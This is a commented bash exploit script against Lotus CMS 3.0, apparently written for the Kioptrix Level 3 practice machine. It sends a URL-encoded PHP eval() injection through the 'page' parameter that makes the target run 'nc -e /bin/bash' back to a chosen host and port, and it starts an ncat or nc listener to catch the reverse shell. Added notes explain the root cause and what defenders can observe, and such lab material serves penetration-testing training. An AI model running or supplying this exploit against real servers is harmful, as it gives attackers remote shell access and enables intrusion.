#!/bin/bash
# Bash script to exploit Lotus CMS 3.0 on the Kioptrix Level 3 virtual machine.
#
# Layout of the script: an argument-count check with usage text, a delayed
# HTTP request carrying the PHP eval() payload (backgrounded), and a listener
# in the foreground that waits for the resulting callback.
#
# Positional arguments (as used below; the usage line appears to have lost
# the placeholder names, presumably stripped as "<...>" during extraction):
#   $1 - target host, substituted into the request URL
#   $2 - callback host, substituted into the payload
#   $3 - callback port, substituted into the payload and used by the listener
#
# Educator/defender note: the payload shown in the "Payload:" comment makes the
# web server's PHP process run "nc -e /bin/bash", i.e. an outbound shell from
# the web server to $2:$3. The root cause is the application passing the
# "page" parameter into eval(); on the defending side the observable is a web
# server process spawning nc/bash with an outbound connection to a port
# unrelated to HTTP.
if [ "$#" -lt 3 ]; then
  echo "[*] Lotus CMS 3.0 PHP eval() exploit."
  echo "[*] Usage: $0 "
  echo "[*] Example: $0 172.16.3.17 172.16.3.18 443"
  # Exits 0 even though no work was done; the usage text is the only output.
  exit 0
fi
# URL encode reference https://www.degraeve.com/reference/urlencoding.php
# space = %20
# ' = %27
# ) = %29
# ( = %28
# ; = %3B
# $ = %24
# } = %7D
# { = %7B
# / = %2F
# Execute cURL in the background with a five second delay to start Ncat before cURL executes the payload.
# Payload: http://kioptrix3.com/index.php?page=index');${exec('nc -e /bin/bash 172.16.3.18 443')};#
# The subshell runs in the background ("&") so the listener below starts
# immediately; the 5 s sleep is the only synchronisation between the two.
# "&> /dev/null" discards curl's output and errors, so a failed request is not
# reported -- the only feedback is whether the listener receives a connection.
# Note: $1/$2/$3 are unquoted here and below (ShellCheck SC2086); they are
# inserted verbatim into the URL, the POST body and the listener arguments.
(sleep 5; curl http://$1/index.php --data "page=index%27%29%3B%24%7Bexec%28%27nc%20-e%20%2Fbin%2Fbash%20$2%20$3%27%29%7D%3B%23" &> /dev/null) &
# Use Ncat if it is available, if not use Nc.
# The check is against a fixed path rather than a PATH lookup (command -v), so
# an ncat installed elsewhere falls through to the plain nc branch.
if [ -f "/usr/bin/ncat" ]; then
  # "--allow $1" limits the listener to connections from the target host;
  # the nc fallback below has no equivalent and accepts any client.
  ncat -nvlp $3 --allow $1
else
  nc -nvlp $3
fi